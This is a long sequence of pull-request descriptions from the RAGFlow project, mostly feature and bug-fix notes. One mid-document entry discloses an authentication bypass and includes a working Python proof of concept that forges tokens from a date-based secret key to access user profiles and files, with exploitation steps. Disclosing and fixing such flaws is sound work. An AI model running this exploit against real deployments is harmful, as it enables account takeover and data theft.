The current master code should work fine, but hI ave some warnings, so I
added a declare to improve the warning
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: The value selected in the Select component only displays the icon
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
#8074
Oss support opendal(including mysql)
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Validate dataset name in knowledge base update endpoint to ensure:
- Name is a non-empty string
- Name length doesn't exceed DATASET_NAME_LIMIT
- Whitespace is trimmed before processing
Prevents invalid dataset names from being saved and provides clear error
messages.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix auto-keyword and auto-question fail with qwq model. #8189
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add SwitchForm component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Change the condition from checking for >1 to >=1 when validating
duplicate knowledgebase names to properly catch all duplicates. This
ensures no two knowledgebases can have the same name for a tenant.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Trim whitespace before checking for empty dataset names
- Change length check from >= to > DATASET_NAME_LIMIT for consistency
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add Qwen3-Embedding text-embedding-v4.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Rename `api_key` fixture to `HttpApiAuth` across all test files
- Update all dependent fixtures and test cases to use new naming
- Maintain same functionality while improving naming clarity
The rename better reflects the fixture's purpose as an HTTP API
authentication helper rather than just an API key.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
- Update chat assistant tests to use dataset.id directly in payloads
- Enhance document parsing tests with better condition checking
- Add explicit type hints and improve timeout handling
Action_7556
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Display the agent node running timeline #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display agent operator call log #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Enhanced the image rotation handling by evaluating the original
orientation, clockwise 90°, and counter-clockwise 90° rotations. The
image with the highest text recognition score is now selected, improving
accuracy for text detection in images with aspect ratios >= 1.5.
#8166
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: wenrui.cao <wenrui.cao@univers.com>
### What problem does this PR solve?
fixes the following deprecation emitted from `download_deps.py`:
```
UserWarning: `local_dir_use_symlinks` parameter is deprecated and will be ignored. The process to download files to a local folder has been updated and do not rely on symlinks anymore. You only need to pass a destination folder as`local_dir`
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Improve robustness of Jina, Nvidia, and SILICONFLOW embedding models by:
1. Adding try-catch blocks for JSON decode errors
2. Logging error details including response content
3. Raising exceptions with meaningful error messages
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Let system variables appear in operator prompts #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Replace manual venv activation with `uv run` for pytest commands
- Add dynamic test level (p2/p3) based on GitHub event type
- Simplify test commands by removing redundant directory changes
### Type of change
- [x] Update Action
### What problem does this PR solve?
for kb.app list method when owner_ids the total calculate is wrong (now
will base on the paged result to calculate total)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Constructing query parameter options for the Retrieval operator
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Issue: #8051
The current implementation assumes JWKS endpoints follow the standard
`/.well-known/jwks.json` convention. This breaks authentication for OIDC
providers that use non-standard JWKS paths, resulting in 404 errors
during token validation.
Root Cause Analysis
- The OpenID Connect specification doesn't mandate a fixed path for JWKS
endpoints
- Some identity providers (like certain Keycloak configurations) use
custom endpoints
- Our previous approach constructed JWKS URLs by convention rather than
discovery
### Solution Approach
Instead of constructing JWKS URLs by appending to the issuer URI, we
now:
1. Properly leverage the `jwks_uri` from the OIDC discovery metadata
2. Honor the identity provider's actual configured endpoint
```python
# Before (fragile approach)
jwks_url = f"{self.issuer}/.well-known/jwks.json"
# After (standards-compliant)
jwks_cli = jwt.PyJWKClient(self.jwks_uri) # Use discovered endpoint
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR aims to slove #8120 which request a better error display of
duplicate column names.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add agent operator node from agent form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Consolidate HTTP API test fixtures using batch operations
(batch_add_chunks, batch_create_chat_assistants)
- Fix fixture initialization order in clear_session_with_chat_assistants
- Add new SDK API test suite for session management
(create/delete/list/update)
### Type of change
- [x] Add test cases
- [x] Refactoring
### What problem does this PR solve?
Feat: Display chat content on the agent page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Convert the prompt field of the agent operator to an array #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Implement new SDK API test cases for chat assistant CRUD operations
- Enhance HTTP API concurrent tests to use as_completed for better
reliability
### Type of change
- [x] Add test cases
- [x] Refactoring
### What problem does this PR solve?
- Consolidate database operations within single try-except blocks in the
methods
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Support passing the attribute check when the upstream has already made
sure it.
### Type of change
- [X] Performance Improvement
### What problem does this PR solve?
Previously when LLM.model_name was not configured:
- System incorrectly defaulted to 'deepseek-chat' model
- This caused permission errors for unauthorized tenants
Now:
- Use tenant's default chat_model configuration first
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Previously when LLM.rerank_model was not configured:
- SDK would pass None as the value
- Database field with null=False constraint would reject it
- Caused storage failures for unset rerank_model cases
Now:
- SDK checks for None value before database operations
- Provides empty string as default when rerank_model is unset
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Improve concurrent test cases by using as_completed for better
reliability
- Rename variables for clarity (chunk_num -> count)
- Add new SDK API test suite for chunk management operations
- Update HTTP API tests with consistent concurrency patterns
### Type of change
- [x] Add test cases
- [x] Refactoring
### What problem does this PR solve?
Feat: Reference the output variable of the upstream operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Enables the message operator form to reference the data defined by
the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Receive reply messages of different event types from the agent
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Currently, as long as there are tasks in Redis, this loop will keep
getting the tasks. This will lead to a single task executor with many
tasks in the pending state. Then we need to wait for the pending tasks
to get them back in the queue.
In first place, if we set the `MAX_CONCURRENT_TASKS` to X, then only X
tasks should be picked from the queue, and others should be left in the
queue for other `task_executors` or be picked after 1 of the spots in
the current executor gets free. This PR ensures this behavior.
The additional changes were due to the Ruff linting in pre-commit. But I
believe these are expected to keep the coding style.
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Added name filtering capability for Dataset.list_documents()
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
An exception is thrown only when the json file has only two keys, `code`
and `message`. In other cases, response.content is returned normally.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed an issue where using the new quote markers would cause
dialogue output to have delete symbols #7623
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Convert the inputs parameter of the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Solved the problem that BeginForm would get stuck when modifying
data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
now Streamning logic is not match with none streaming logic, which may
introduce down stream can not find upstream components.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Description
There's a critical authentication bypass vulnerability that allows
remote attackers to gain unauthorized access to user accounts without
any credentials. The vulnerability stems from two security flaws: (1)
the application uses a predictable `SECRET_KEY` that defaults to the
current date, and (2) the authentication mechanism fails to properly
validate empty access tokens left by logged-out users. When combined,
these flaws allow attackers to forge valid JWT tokens and authenticate
as any user who has previously logged out of the system.
The authentication flow relies on JWT tokens signed with a `SECRET_KEY`
that, in default configurations, is set to `str(date.today())` (e.g.,
"2025-05-30"). When users log out, their `access_token` field in the
database is set to an empty string but their account records remain
active. An attacker can exploit this by generating a JWT token that
represents an empty access_token using the predictable daily secret,
effectively bypassing all authentication controls.
### Source - Sink Analysis
**Source (User Input):** HTTP Authorization header containing
attacker-controlled JWT token
**Flow Path:**
1. **Entry Point:** `load_user()` function in `api/apps/__init__.py`
(Line 142)
2. **Token Processing:** JWT token extracted from Authorization header
3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from
`api/settings.py` (Line 123)
4. **Database Query:** `UserService.query()` called with decoded empty
access_token
5. **Sink:** Authentication succeeds, returning first user with empty
access_token
### Proof of Concept
```python
import requests
from datetime import date
from itsdangerous.url_safe import URLSafeTimedSerializer
import sys
def exploit_ragflow(target):
# Generate token with predictable key
daily_key = str(date.today())
serializer = URLSafeTimedSerializer(secret_key=daily_key)
malicious_token = serializer.dumps("")
print(f"Target: {target}")
print(f"Secret key: {daily_key}")
print(f"Generated token: {malicious_token}\n")
# Test endpoints
endpoints = [
("/v1/user/info", "User profile"),
("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing")
]
auth_headers = {"Authorization": malicious_token}
for path, description in endpoints:
print(f"Testing {description}...")
response = requests.get(f"{target}{path}", headers=auth_headers)
if response.status_code == 200:
data = response.json()
if data.get("code") == 0:
print(f"SUCCESS {description} accessible")
if "user" in path:
user_data = data.get("data", {})
print(f" Email: {user_data.get('email')}")
print(f" User ID: {user_data.get('id')}")
elif "file" in path:
files = data.get("data", {}).get("files", [])
print(f" Files found: {len(files)}")
else:
print(f"Access denied")
else:
print(f"HTTP {response.status_code}")
print()
if __name__ == "__main__":
target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
exploit_ragflow(target_url)
```
**Exploitation Steps:**
1. Deploy RAGFlow with default configuration
2. Create a user and make at least one user log out (creating empty
access_token in database)
3. Run the PoC script against the target
4. Observe successful authentication and data access without any
credentials
**Version:** 0.19.0
@KevinHuSh @asiroliu @cike8899
Co-authored-by: nkoorty <amalyshau2002@gmail.com>
### What problem does this PR solve?
Feat: Create empty agent #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Removed hardcoded Zhipu API key from codebase
- New requirement: Tests now require ZHIPU_AI_API_KEY environment
variable
Example: export ZHIPU_AI_API_KEY=your_api_key_here
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
The Unicode codepoint ',' (U+FF0C) is meant to be used in Chinese text,
but this is English text. It looks like a comma followed by a space, but
isn't. Of course I didn't change actual Chinese text.
### What problem does this PR solve?
Mixup of Unicode characters. This is probably unnoticed by most users,
but I wonder if screen readers would read it out differently or if LLMs
would trip up on it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add RunSheet component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR updates the completion function to allow parameter updates when
a session_id exists. It also ensures changes are saved back to the
database via API4ConversationService.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix parser_config=None handling in create_dataset
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
## Summary
Fixed grammar errors and improved clarity in prompt templates throughout
`rag/prompts.py`.
## Changes Made
- **Fixed incomplete sentence**: `"If the user's latest question is
completely, don't do anything"` → `"If the user's latest question is
already complete, don't do anything"`
- **Improved phrasing**: `"of like [ID:i]"` → `"such as [ID:i]"`
- **Added missing articles**: `"give top 3"` → `"give the top 3"`
- **Fixed prepositions**: `"in language of"` → `"in the same language
as"`
- **Corrected spelling**: `"Jappanese"` → `"Japanese"`
- **Standardized formatting**: Consistent role descriptions and
punctuation
## Impact
These changes improve prompt readability and should make instructions
clearer for the underlying language models.
## Test Plan
- [x] Verified changes maintain original prompt functionality
- [x] No breaking changes to prompt structure or expected outputs
Co-authored-by: Adrian Altermatt <adrian.altermatt@fgcz.uzh.ch>
### What problem does this PR solve?
Feat: Add DynamicPrompt component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add AgentNode component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8006
The category should work well, but the category's downstream seems to be
unable to get the upstream output.
Add the category's output as an attribute.
However, in base.py, there is logic
` if self.component_name.lower().find("switch") < 0 and
self.get_component_name(u) in ["relevant", "categorize"]:
continue`
If goto this cases will not tried to get output from Category (but I do
not have full context about this if logic).
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Construct RetrievalForm with original fields #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
sync test group from sdk/python/pyproject.toml to top pyproject.toml
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update the synonym dictionary file with relevant time and date to
prevent synonyms from being mistakenly escaped.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Add the example component of the classification operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Use one-way data flow to synchronize the form data to the canvas
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix unnecessary truncation in markdown parser. So that markdown can work
perfectly like
[this](https://github.com/infiniflow/ragflow/issues/7824#issuecomment-2921312576)
in #7824, supporting multiple special delimiters.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Change filename length limit from 128 to 256
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
**Fix: Prevent Flask hot reload from hanging due to early thread
startup**
### What problem does this PR solve?
When running the Flask server with `use_reloader=True` (enabled during
debug mode), modifying a Python source file would trigger a reload
detection (`Detected change in ...`), but the application would hang
instead of restarting cleanly.
This was caused by the `update_progress` background thread being started
**too early**, often within the main module scope.
This issue was reported in
[#7498](https://github.com/infiniflow/ragflow/issues/7498).
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---
**Summary of changes:**
- Wrapped `update_progress` launch in a `threading.Timer` with delay to
avoid premature thread execution.
- Marked thread as `daemon=True` to avoid blocking process exit.
- Added `WERKZEUG_RUN_MAIN` environment check to ensure background
threads only run in the reloader child process (the actual Flask app).
- Retained original behavior in production mode (`debug=False`).
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
If the name field is not specified, Docker Compose will default to using
`docker` as the project name. This may cause conflicts with other
default projects, leading to unintended operations when executing
`docker compose` commands.
### What problem does this PR solve?
When executing Docker Compose commands, interference occurs between
multiple default projects, leading to operational chaos.
### Type of change
- [x] Other (please describe):
### What problem does this PR solve?
When performing the dify_retrieval, the metadata of the document was
empty.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
When deleting knowledge base documents in RAGFlow, the current process
only removes the block texts in Elasticsearch and the original files in
MinIO, but it leaves behind many binary images and thumbnails generated
during chunking. This pull request improves the deletion process by
querying the block information in Elasticsearch to ensure a more
thorough and complete cleanup.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Install why-did-you-render to detect component updates #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7753
The internal is due to when the selected row keys change will trigger a
testing, but I do not know why.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add InnerBlurInput component to avoid frequent updates of zustand
causing the input box to lose focus #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix code component debug issue. #7908.
I delete the additions in #7933, there is no semantic meaning `output`
for `parameters`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add advanced delimiter detection for naive merge. #7824
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
it would be fail if PARALLEL_DEVICES = None in OCR class , because it
pass 0 to TextDetector and TextRecognizer init method.
and It would be simpler to set 0 as the default value for
PARALLEL_DEVICES.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7908
For the code
` _, out = cpn.output(allow_partial=False)`
` def output(self, allow_partial=True) -> Tuple[str, Union[pd.DataFrame,
partial]]:
o = getattr(self._param, self._param.output_var_name)`
need to call this method
But I do not have a full context.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Use memo to wrap canvas nodes to improve fluency #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Truncate long agent descriptions to prevent overflow outside the agent
card container
### What problem does this PR solve?
Now the Long text of description will overflow from the agent card,
should display the long text properly with truncate.
<img width="275" alt="Screenshot 2025-05-28 220329"
src="https://github.com/user-attachments/assets/954b3a48-bcab-4669-a42f-6981d4bf859f"
/>
<img width="275" alt="Screenshot 2025-05-28 220353"
src="https://github.com/user-attachments/assets/f385d95a-3e40-4117-b412-ae6a4508e646"
/>
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat:: Use useWatch to synchronize the form data to canvas zustand #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Change citation mark as [ID:n], it's easier for LLMs to follow the
instruction :) #7904
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Fix: Display bug in the early stage of conversation chat #7904
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix early return when update doc. #7886
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
…sing the SDK chat API
### What problem does this PR solve?
When using the SDK for chat, you can include the IDs of additional
knowledge bases you want to use in the request. This way, you don’t need
to repeatedly create new assistants to support various combinations of
knowledge bases. This is especially useful when there are many knowledge
bases with different content. If users clearly know which knowledge base
contains the information they need and select accordingly, the recall
accuracy will be greatly improved.
Users only need to add an extra field, a kb_ids array, in the HTTP
request. The content of this field can be determined by the client
fetching the list of knowledge bases and letting the user select from
it.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: Li Ye <liye@unittec.com>
conversation change to sessions
### What problem does this PR solve?
related_question interface has wrong uri in HTTP API doc
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Close#7879
I checked the current master code, the kb_parser_config is join from
knowledge table, so I think should be some edge cases due to history
data
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
**Issue Description:**
When using the `/api/retrieval` endpoint with a POST request and setting
the `keyword` parameter to `true`, the system invokes the
`model_instance` method from `TenantLLMService` to create a `chat_mdl`
instance. Subsequently, it calls the `keyword_extraction` method to
extract keywords.
However, within the `keyword_extraction` method, the `chat` function of
the LLM attempts to access the `chat_mdl.max_length` attribute to
validate input length. This results in the following error:
```
AttributeError: 'SILICONFLOWChat' object has no attribute 'max_length'
```
**Proposed Solution:**
Upon reviewing other parts of the codebase where `chat_mdl` instances
are created, it appears that utilizing `LLMBundle` for instantiation is
more appropriate. `LLMBundle` includes the `max_length` attribute, which
should resolve the encountered error.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
add DeepWiki Badge Maker
### Type of change
- [x] Other (please describe):add DeepWiki Badge Maker
---------
Co-authored-by: lixiaodong11 <lixiaodong11@hikvision.com.cn>
### What problem does this PR solve?
Feat: Add the SelectWithSearch component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Put buildSelectOptions to common-util.ts #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
There are two main changes:
1. Update xgboost to 1.6.0 to build the project on MacOS with Apple
chips, this change refers to the issue:
https://github.com/infiniflow/ragflow/issues/5114.
2. When `use_china_mirrors` is set in `download_deps.py`, the names of
chrome files downloaded by the script will be different from the file
names used in Dockerfile, so I added the file name in `get_urls`
function to solve this problem.
I think it's better to add testing for Docker image
`infiniflow/ragflow_deps` to the test workflow, but since the workflow
is currently running on a self-hosted runner, I'm not sure how to modify
it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add the WaitingDialogue operator. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR solve the problems metioned in the
pr(https://github.com/infiniflow/ragflow/pull/7140) which is also
submitted by me
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### Introduction
I fixed the problems when using OpenSearch as the DOC_ENGINE, the
failures of pytest and the wrong API's return.
Mainly about delete chunk, list chunks, update chunk, retrieval chunk.
The pytest comand "cd sdk/python && uv sync --python 3.10 --group test
--frozen && source .venv/bin/activate && cd test/test_http_api &&
DOC_ENGINE=opensearch pytest test_chunk_management_within_dataset -s
--tb=short " is finally successful.
###Others
As some changes between Elasticsearch And Opensearch differ, some pytest
results about OpenSearch are correct and resonable. However, some pytest
params (skipif params) are incompatible. So I changed some pytest params
about skipif.
As a search engine programmer, I will still focus on the usage of vector
databases (especially OpenSearch) for the RAG stuff.
Thanks for your review
### What problem does this PR solve?
Feat: Convert the data of the messge operator to a string array #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [x] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Upgrade react-hook-form to the latest version to solve the problem
that appending a useFieldArray entry cannot trigger the watch callback
function #3221
[issue: watch is not called when appending first item to Field Array
#12370](https://github.com/react-hook-form/react-hook-form/issues/12370)
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Close#7830
The caller method should already have code to handle this.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Delete Corresponding Minio Bucket When Deleting a Knowledge Base
[issue #4113 ](https://github.com/infiniflow/ragflow/issues/4113)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue that the script text of the code operator is not
displayed after refreshing the page after saving the script text of the
code operator #4977
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Refactor the MessageForm with shadcn #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add more robust fallbacks for citations
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
change default models to buildin models
https://github.com/infiniflow/ragflow/issues/7774
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
1. Add sandbox options for max memory and timeout.
2. Malicious code detection for Python only.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add code_executor_manager. #4977.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Translate the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Reconstruct the QueryTable of BeginForm using shandcn #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Synchronize BeginForm's query data to the canvas #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: xiaohzho <xiaohzho@cisco.com>
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Feat: Verify the parameters of the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Refactor BeginForm with shadcn #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
This small PR resolves the regex library warnings showing in Python3.11:
```python
DeprecationWarning: 'count' is passed as positional argument
```
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [x] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Signed-off-by: Emmanuel Ferdman <emmanuelferdman@gmail.com>
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7761
but it may be difficult to achieve 0 delay (which need to pass the
cancel token to all parts)
Another solution is just 0 delay effect at UI.
And task will stop latter
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add return value widget to CodeForm #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Switching the programming language of the code operator will
switch the corresponding language template #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where the page would refresh continuously when
opening the sheet on the right side of the canvas #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
delete useless image blobs when the task executor meets edge cases
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Render the agent list page by page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Migrate the code operator to the new agent. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The image displayed in the reply message can also be clicked to
display the location of the source document where the slice is located
#7623
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR introduces Pydantic-based validation for the list datasets HTTP
API, improving code clarity and robustness. Key changes include:
Pydantic Validation
Error Handling
Test Updates
Documentation Updates
### Type of change
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Add OAuth `state` parameter for CSRF protection:
- Updated `get_authorization_url()` to accept an optional state
parameter
- Generated a unique state value during OAuth login and stored in
session
- Verified state parameter in callback to ensure request legitimacy
This PR follows OAuth 2.0 security best practices by ensuring that the
authorization request originates from the same user who initiated the
flow.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix:When you create a new API module named xxxa_api, the access route
will become xxx instead of xxxa. For example, when I create a new API
module named 'data_api', the access route will become 'dat' instead of
'data'
Fix:Fixed the issue where the new knowledge base would not be renamed
when there was a knowledge base with the same name
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: tangyu <1@1.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Modify the Python language template code of the code operator
#4977
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
More fallbacks for bad citation format
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
Fixed uncaptured figure data with position information. #7466, #7681
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Try the best to repair corrupted PDF files on upload automatically.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Updated the dialog settings function to add a default prompt
configuration for no dataset.
- The prompt configuration will be determined based on the presence of
`kb_ids` in the request.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (Non-breaking change, adding functionality)
- [ ] Documentation Update
